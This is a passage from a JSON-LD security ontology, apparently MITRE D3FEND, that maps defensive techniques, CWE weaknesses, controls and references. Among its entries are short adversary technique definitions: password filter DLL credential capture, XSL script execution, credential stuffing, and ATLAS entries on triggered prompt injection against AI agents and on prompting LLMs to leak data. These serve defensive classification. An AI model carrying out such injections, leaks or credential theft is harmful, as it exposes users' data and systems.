      },
      "d3f:definition": "Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated.",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Password Filter DLL",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1556"
        },
        {
          "@id": "_:N21fe6aa374aa4c83815c7f3706c02e64"
        },
        {
          "@id": "_:N2acd0ce09e8d4e01bdbc3e9271b74d74"
        }
      ]
    },
    {
      "@id": "_:N21fe6aa374aa4c83815c7f3706c02e64",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N2acd0ce09e8d4e01bdbc3e9271b74d74",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:CloudServiceAuthorization",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Cloud authorization is the function of specifying access rights to cloud resources.",
      "rdfs:label": "Cloud Service Authorization",
      "rdfs:subClassOf": {
        "@id": "d3f:Authorization"
      }
    },
    {
      "@id": "d3f:CCI-001767_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs an allow-all, deny-by-exception policy to prohibit the execution of unauthorized software programs on the information system.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ExecutableDenylisting"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-02-28T00:00:00"
      },
      "rdfs:label": "CCI-001767"
    },
    {
      "@id": "d3f:HostShutdown",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:HostShutdown",
        "d3f:ProcessTermination"
      ],
      "d3f:d3fend-id": "D3-HS",
      "d3f:definition": "Initiating a host's shutdown sequence to terminate all running processes.",
      "d3f:kb-article": "## How It Works\n\nHost shutdown can either be initiated in the physical presence of the device using the power functions or remotely using the provided user interface or an installed EDR agent (with the available function). This process may allow for the removal of specific types of malware, such as fileless malware, and can also prevent further damage, for example, if the system is part of a botnet.\n\n## Considerations\n\n- If the attacker has achieved persistence techniques, this technique may not be effective\n- Compromised systems may not respond to remote commands to shutdown or reboot, requiring physical intervention.\n- Shutting down a system will usually result in the memory losing its state which can be useful in forensic activities so this should be considered when deciding to shutdown.\n- Shutting down systems may disrupt access to computer resources for legitimate users.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NearMemoryInMemoryDetectionofFilelessMalware"
      },
      "d3f:terminates": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Host Shutdown",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessEviction"
        },
        {
          "@id": "_:N30afb43087424e7abacde0963c54dddd"
        }
      ]
    },
    {
      "@id": "_:N30afb43087424e7abacde0963c54dddd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:terminates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:WindowsNtQuerySystemTime",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Returns current time in Coordinated Universal Time (UTC) 8-bytes format.",
      "rdfs:label": "Windows NtQuerySystemTime",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIGetSystemTime"
      }
    },
    {
      "@id": "d3f:AML.T0051.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0051.002",
      "d3f:definition": "An adversary may trigger a prompt injection via a user action or event that occurs within the victim's environment. Triggered prompt injections often target AI agents, which can be activated by means the adversary identifies during [Discovery](/tactics/AML.TA0008) (See [Activation Triggers](/techniques/AML.T0084.002)). These malicious prompts may be hidden or obfuscated from the user and may already exist somewhere in the victim's environment from the adversary performing [Prompt Infiltration via Public-Facing Application](/techniques/AML.T0093). This type of injection may be used by the adversary to gain a foothold in the system or to target an unwitting user of the system.",
      "rdfs:label": "Triggered - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0051.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0051"
      },
      "skos:prefLabel": "Triggered"
    },
    {
      "@id": "d3f:ForwardProxyServer",
      "@type": "owl:Class",
      "d3f:definition": "An forward (or open) proxy is a proxy server that is accessible by any Internet user. Generally, a proxy server only allows users within a network group (i.e. a closed proxy) to store and forward Internet services such as DNS or web pages to reduce and control the bandwidth used by the group. With an open proxy, however, any user on the Internet is able to use this forwarding service.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Open_proxy"
      },
      "rdfs:label": "Forward Proxy Server",
      "rdfs:subClassOf": {
        "@id": "d3f:ProxyServer"
      }
    },
    {
      "@id": "d3f:CWE-49",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-49",
      "d3f:definition": "The product accepts path input in the form of trailing slash ('filedir/') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: 'filename/' (Trailing Slash)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-162"
        },
        {
          "@id": "d3f:CWE-41"
        }
      ]
    },
    {
      "@id": "d3f:EX-0009.02",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0009.02",
      "d3f:definition": "At the OS layer the attacker targets primitives that schedule work and mediate hardware. Maintenance builds may expose shells or management consoles; misconfigurations around these interfaces can provide paths to command interpreters or privileged syscalls. Exploitation yields kernel-mode execution, arbitrary memory read/write, or control of scheduling and address spaces, letting the actor tamper with FSW processes, intercept command paths, or manipulate storage and bus drivers beneath application checks. The technique leverages generic OS weaknesses adapted to the spacecraft’s particular build, turning low-level control into mission-facing effects that appear to originate from legitimate processes.",
      "d3f:modifies": {
        "@id": "d3f:OperatingSystem"
      },
      "rdfs:label": "Operating System - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0009/02/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0009"
        },
        {
          "@id": "_:N4aa37a6266cb4c89b862170ac0e4a81a"
        }
      ],
      "skos:prefLabel": "Operating System"
    },
    {
      "@id": "_:N4aa37a6266cb4c89b862170ac0e4a81a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystem"
      }
    },
    {
      "@id": "d3f:ExecutableScript",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An executable script is written in a scripting language and interpreted at run time. This is in contrast with an executable binary, which contains machine code instructions for a physical CPU or byte code for a virtual machine.",
      "rdfs:label": "Executable Script",
      "rdfs:seeAlso": {
        "@id": "dbr:Executable"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "d3f:CWE-263",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-263",
      "d3f:definition": "The product supports password aging, but the expiration period is too long.",
      "rdfs:label": "Password Aging with Long Expiration",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:WriteFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The write is one of the most basic routines provided by a Unix-like operating system kernel. It writes data from a buffer declared by the user to a given device, such as a file. This is the primary way to output data from a program by directly using a system call. The destination is identified by a numeric code. The data to be written, for instance a piece of text, is defined by a pointer and a size, given in number of bytes. write thus takes three arguments.",
      "d3f:modifies": {
        "@id": "d3f:File"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Write_(system_call)"
      },
      "rdfs:label": "Write File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Nb1e79fcc08f04e9ca2a06c86230218fb"
        }
      ]
    },
    {
      "@id": "_:Nb1e79fcc08f04e9ca2a06c86230218fb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:Reference-IndirectBranchingCalls",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.1048.1241&rep=rep1&type=pdf"
      },
      "d3f:kb-abstract": "Return-oriented programming (ROP) has become the\nprimary exploitation technique for system compromise\nin the presence of non-executable page protections. ROP\nexploits are facilitated mainly by the lack of complete\naddress space randomization coverage or the presence\nof memory disclosure vulnerabilities, necessitating additional ROP-specific mitigations.\nIn this paper we present a practical runtime ROP exploit prevention technique for the protection of thirdparty applications. Our approach is based on the detection of abnormal control transfers that take place during\nROP code execution. This is achieved using hardware\nfeatures of commodity processors, which incur negligible runtime overhead and allow for completely transparent operation without requiring any modifications to\nthe protected applications. Our implementation for Windows 7, named kBouncer, can be selectively enabled for\ninstalled programs in the same fashion as user-friendly\nmitigation toolkits like Microsoft's EMET. The results of\nour evaluation demonstrate that kBouncer has low runtime overhead of up to 4%, when stressed with specially\ncrafted workloads that continuously trigger its core detection component, while it has negligible overhead for\nactual user applications. In our experiments with in-thewild ROP exploits, kBouncer successfully protected all\ntested applications, including Internet Explorer, Adobe\nFlash Player, and Adobe Reader.",
      "d3f:kb-author": "Vasilis Pappas, Michalis Polychronakis, Angelos D. Keromytis\nColumbia University",
      "d3f:kb-organization": "Columbia University",
      "d3f:kb-reference-of": {
        "@id": "d3f:IndirectBranchCallAnalysis"
      },
      "d3f:kb-reference-title": "Transparent ROP Exploit Mitigation using Indirect Branch Tracing",
      "rdfs:label": "Reference - Indirect Branching Calls"
    },
    {
      "@id": "d3f:CWE-252",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-252",
      "d3f:definition": "The product does not check the return value from a method or function, which can prevent it from detecting unexpected states and conditions.",
      "rdfs:label": "Unchecked Return Value",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-754"
      }
    },
    {
      "@id": "d3f:CWE-923",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-923",
      "d3f:definition": "The product establishes a communication channel to (or from) an endpoint for privileged or protected operations, but it does not properly ensure that it is communicating with the correct endpoint.",
      "rdfs:label": "Improper Restriction of Communication Channel to Intended Endpoints",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:SessionTermination",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SessionTermination"
      ],
      "d3f:d3fend-id": "D3-ST",
      "d3f:definition": "Forcefully end all active sessions associated with compromised accounts or devices.",
      "d3f:deletes": {
        "@id": "d3f:Session"
      },
      "d3f:kb-article": "Defined in NIST 800-53 as AC-12.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NIST-Special-Publication-800-53A-Revision-5"
      },
      "rdfs:label": "Session Termination",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessEviction"
        },
        {
          "@id": "_:Nb71e2427a12f42498b278437c9c65805"
        }
      ]
    },
    {
      "@id": "_:Nb71e2427a12f42498b278437c9c65805",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Session"
      }
    },
    {
      "@id": "d3f:CWE-1109",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1109",
      "d3f:definition": "The code contains a callable, block, or other code element in which the same variable is used to control more than one unique task or store more than one instance of data.",
      "rdfs:label": "Use of Same Variable for Multiple Purposes",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:T1213.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:WebFileResource"
      },
      "d3f:attack-id": "T1213.001",
      "d3f:definition": "Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:",
      "rdfs:label": "Confluence",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1213"
        },
        {
          "@id": "_:N7926f4eda6bd4df6aa5216d744fec216"
        }
      ]
    },
    {
      "@id": "_:N7926f4eda6bd4df6aa5216d744fec216",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WebFileResource"
      }
    },
    {
      "@id": "d3f:Reference-MethodForControllingComputerNetworkSecurity_CheckpointSoftwareTechnologiesLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/EP0658837B1/"
      },
      "d3f:kb-abstract": "A method of operating a security system for a computer network in which data is passed in said network as data packets, said system controlling the passage of said data packets in the network according to a security rule, where each aspect of said network controlled by said security rule has been defined, said security rule has been defined in terms of said aspects and converted into a set of filter language instructions.",
      "d3f:kb-author": "Gil Shwed",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Checkpoint Software Technologies Ltd",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundTrafficFiltering"
      },
      "d3f:kb-reference-title": "Method for controlling computer network security",
      "rdfs:label": "Reference - Method for controlling computer network security - Checkpoint Software Technologies Ltd"
    },
    {
      "@id": "d3f:ATTACKMobileDiscoveryTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0032"
      },
      "rdfs:label": "Discovery Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:N446094426e9449b7acec88e8770e5a16"
        }
      ],
      "skos:prefLabel": "Discovery Technique"
    },
    {
      "@id": "_:N446094426e9449b7acec88e8770e5a16",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0032"
      }
    },
    {
      "@id": "d3f:ExecutionIsolation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ExecutionIsolation"
      ],
      "d3f:d3fend-id": "D3-EI",
      "d3f:definition": "Execution Isolation techniques prevent application processes from accessing non-essential system resources, such as memory, devices, or files.",
      "d3f:enables": {
        "@id": "d3f:Isolate"
      },
      "rdfs:label": "Execution Isolation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N09a278c57e35415fa871d613c521dcf0"
        }
      ]
    },
    {
      "@id": "_:N09a278c57e35415fa871d613c521dcf0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Isolate"
      }
    },
    {
      "@id": "d3f:invokes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x invokes y: The subject x invokes a system service by use of an instruction object y that interrupts the program being executed and passes control to the operating system to perform that operation.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/06599393-n"
      },
      "rdfs:label": "invokes",
      "rdfs:seeAlso": {
        "@id": "dbr:System_call"
      },
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:executes"
        },
        {
          "@id": "d3f:may-invoke"
        }
      ],
      "skos:altLabel": "calls"
    },
    {
      "@id": "d3f:OTAbortCommandEvent",
      "@type": "owl:Class",
      "rdfs:label": "OT Abort Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommandEvent"
        },
        {
          "@id": "_:Ne2ca788a90c94171b98ab9fcd5d14e22"
        },
        {
          "@id": "_:N9358d68d9fbf40f588b550f22f6bc12e"
        },
        {
          "@id": "_:Nfe3739685149441484451216d828fb2f"
        }
      ]
    },
    {
      "@id": "_:Ne2ca788a90c94171b98ab9fcd5d14e22",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTAbortCommand"
      }
    },
    {
      "@id": "_:N9358d68d9fbf40f588b550f22f6bc12e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "_:Nfe3739685149441484451216d828fb2f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTRunCommandEvent"
      }
    },
    {
      "@id": "d3f:T1220",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:File"
      },
      "d3f:attack-id": "T1220",
      "d3f:definition": "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)",
      "d3f:interprets": {
        "@id": "d3f:ExecutableScript"
      },
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "rdfs:label": "XSL Script Processing",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "_:N643f43352a1545ae850ae23aa95dd1bf"
        },
        {
          "@id": "_:N7d2c2895b76f42b3a1ed2571b22cf326"
        },
        {
          "@id": "_:Nd54d1dea1ad54fdca77cb2515d944c88"
        }
      ]
    },
    {
      "@id": "_:N643f43352a1545ae850ae23aa95dd1bf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:N7d2c2895b76f42b3a1ed2571b22cf326",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:interprets"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "_:Nd54d1dea1ad54fdca77cb2515d944c88",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:WindowsCreateProcessA",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Creates a new process and its primary thread. The new process runs in the security context of the calling process.",
      "d3f:invokes": [
        {
          "@id": "d3f:WindowsNtCreateProcess"
        },
        {
          "@id": "d3f:WindowsNtCreateProcessEx"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa"
      },
      "rdfs:label": "Windows CreateProcessA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPICreateProcess"
        },
        {
          "@id": "_:N114fdc6bd58d4adeade698e7e01e34aa"
        },
        {
          "@id": "_:N017bf9c7842d43cfa279dd57118aa8a5"
        }
      ]
    },
    {
      "@id": "_:N114fdc6bd58d4adeade698e7e01e34aa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtCreateProcess"
      }
    },
    {
      "@id": "_:N017bf9c7842d43cfa279dd57118aa8a5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtCreateProcessEx"
      }
    },
    {
      "@id": "d3f:CWE-841",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-841",
      "d3f:definition": "The product supports a session in which more than one behavior must be performed by an actor, but it does not properly ensure that the actor performs the behaviors in the required sequence.",
      "rdfs:label": "Improper Enforcement of Behavioral Workflow",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:CloudServiceProvider",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A cloud service provider delivers scalable and distributed computing resources over a network, enabling clients to access infrastructure, platforms, and applications remotely.",
      "rdfs:label": "Cloud Service Provider",
      "rdfs:subClassOf": {
        "@id": "d3f:ServiceProvider"
      }
    },
    {
      "@id": "d3f:LinuxClone3ArgumentCLONE_THREAD",
      "@type": "owl:Class",
      "d3f:definition": "A flag parameter to the Clone3 syscall. If set, the child is placed in the same thread group as the calling process.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/clone3.2.html"
      },
      "rdfs:label": "Linux Clone3 Argument CLONE_THREAD",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateThread"
      }
    },
    {
      "@id": "d3f:CCI-000766_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements multifactor authentication for network access to non-privileged accounts.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-17T00:00:00"
      },
      "rdfs:label": "CCI-000766"
    },
    {
      "@id": "d3f:WindowsProcess",
      "@type": [
        "owl:NamedIndividual",
        "d3f:Process"
      ],
      "rdfs:label": "Windows Process"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_CM-6_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": {
        "@id": "d3f:ApplicationConfigurationHardening"
      },
      "d3f:control-name": "Configuration Settings | Unauthorized Change Detection",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "CM-6(3)"
    },
    {
      "@id": "d3f:AML.T0057",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0057",
      "d3f:definition": "Adversaries may craft prompts that induce the LLM to leak sensitive information.\nThis can include private user data or proprietary information.\nThe leaked information may come from proprietary training data, data sources the LLM is connected to, or information from other users of the LLM.",
      "rdfs:label": "LLM Data Leakage - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0057"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASExfiltrationTechnique"
      },
      "skos:prefLabel": "LLM Data Leakage"
    },
    {
      "@id": "d3f:T1110.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1110.004",
      "d3f:definition": "Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.",
      "d3f:may-create": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      },
      "d3f:modifies": {
        "@id": "d3f:AuthenticationLog"
      },
      "d3f:produces": {
        "@id": "d3f:Authentication"
      },
      "rdfs:label": "Credential Stuffing",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1110"
        },
        {
          "@id": "_:Nac6c82548acb4f7785e6a3551c7166be"
        },
        {
          "@id": "_:N0309ce98e2d44641b99dc8d2f60d8449"
        },
        {
          "@id": "_:Na040bd803fe7479e94c4be76b9218892"
        }
      ]
    },
    {
      "@id": "_:Nac6c82548acb4f7785e6a3551c7166be",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "_:N0309ce98e2d44641b99dc8d2f60d8449",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationLog"
      }
    },
    {
      "@id": "_:Na040bd803fe7479e94c4be76b9218892",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "d3f:CCI-001941_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements replay-resistant authentication mechanisms for network access to privileged accounts.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:One-timePassword"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001941"
    },
    {
      "@id": "d3f:ActiveCertificateAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ActiveCertificateAnalysis"
      ],
      "d3f:created": {
        "@type": "xsd:dateTime",
        "@value": "2020-08-05T00:00:00"
      },
      "d3f:d3fend-id": "D3-ACA",
      "d3f:definition": "Actively collecting PKI certificates by connecting to the server and downloading its server certificates for analysis.",
      "d3f:kb-article": "## How it works\nAnalysis of server certificates using active methods to detect if certificates have been misconfigured or spoofed by using elements of the certificate, certificate authorities and signatures.\n\n### Certificate validity analysis\nThis can be accomplished by verifying the digital signature on certificate.\n\n### Certificate path analysis\nThe client's browser can perform path verification to ensure that the server's certificate contains a valid trust anchor.\n\n### Certificate configuration analysis\nSome browsers can be configured to implement the key-usage extensions contained certificates. This can help to prevent a certificate from being misused.\n\n### Certificate revocation status analysis\nUsing either Certificate Revocation Lists (CRLs) or Online Certificate Status Protocol (OCSP) to determine the revocation status. OCSP Stapling, binding the status with the certificate, helps to mitigate potential delay in status verifications.\n\n## Considerations\n* Management of the PKI across the enterprise typically requires automation to maintain scalability and flexibility\n* If the certificate authority, issuing the certificate, is compromised then all of the certificates issued by the CA are suspect\n* There may be delays associated with updates to certificates\n* Revoked certificates give the appearance of valid certificates until they are published to a trusted revocation service (OCSP or CRL)\n* The revocation service (OCSP or CRL) may be down during our connection and a browser will need to make a decision will need to be made about trusting the connection",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecuringWebTransactions"
      },
      "rdfs:label": "Active Certificate Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:CertificateAnalysis"
      }
    },
    {
      "@id": "d3f:CWE-755",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-755",
      "d3f:definition": "The product does not handle or incorrectly handles an exceptional condition.",
      "rdfs:label": "Improper Handling of Exceptional Conditions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-703"
      }
    },
    {
      "@id": "d3f:IntranetAdministrativeNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Intranet administrative network traffic is administrative network traffic that does not cross a given network's boundaries and uses a standard administrative protocol.",
      "rdfs:label": "Intranet Administrative Network Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Intranet"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AdministrativeNetworkTraffic"
        },
        {
          "@id": "d3f:IntranetNetworkTraffic"
        }
      ]
    },
    {
      "@id": "d3f:Reference-NIST-Special-Publication-800-160-Volume-1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://doi.org/10.6028/NIST.SP.800-160v1"
      },
      "d3f:kb-abstract": "With the continuing frequency, intensity, and adverse consequences of cyber-attacks, disruptions, hazards, and other threats to federal, state, and local governments, the military, businesses, and the critical infrastructure, the need for trustworthy secure systems has never been more important to the long-term economic and national security interests of the United States. Engineering-based solutions are essential to managing the growing complexity, dynamicity, and interconnectedness of today’s systems, as exemplified by cyber-physical systems and systems-of-systems, including the Internet of Things. This publication addresses the engineering-driven perspective and actions necessary to develop more defensible and survivable systems, inclusive of the machine, physical, and human components that compose the systems and the capabilities and services delivered by those systems. It starts with and builds upon a set of well-established International Standards for systems and software engineering published by the International Organization for Standardization (ISO), the International Electrotechnical Commission (IEC), and the Institute of Electrical and Electronics Engineers (IEEE) and infuses systems security engineering methods, practices, and techniques into those systems and software engineering activities. The objective is to address security issues from a stakeholder protection needs, concerns, and requirements perspective and to use established engineering processes to ensure that such needs, concerns, and requirements are addressed with appropriate fidelity and rigor, early and in a sustainable manner throughout the life cycle of the system.",
      "d3f:kb-author": "Ron Ross, Michael McEvilley, and Janet Carrier Oren",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperationalRiskAssessment"
      },
      "d3f:kb-reference-title": "NIST Special Publication 800-160 Volume 1 - Systems Security Engineering",
      "rdfs:label": "Reference - NIST Special Publication 800-160 Volume 1 - System Security Engineering"
    },
    {
      "@id": "d3f:Reference-DeadCodeElimination",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://nebelwelt.net/files/15LangSec.pdf"
      },
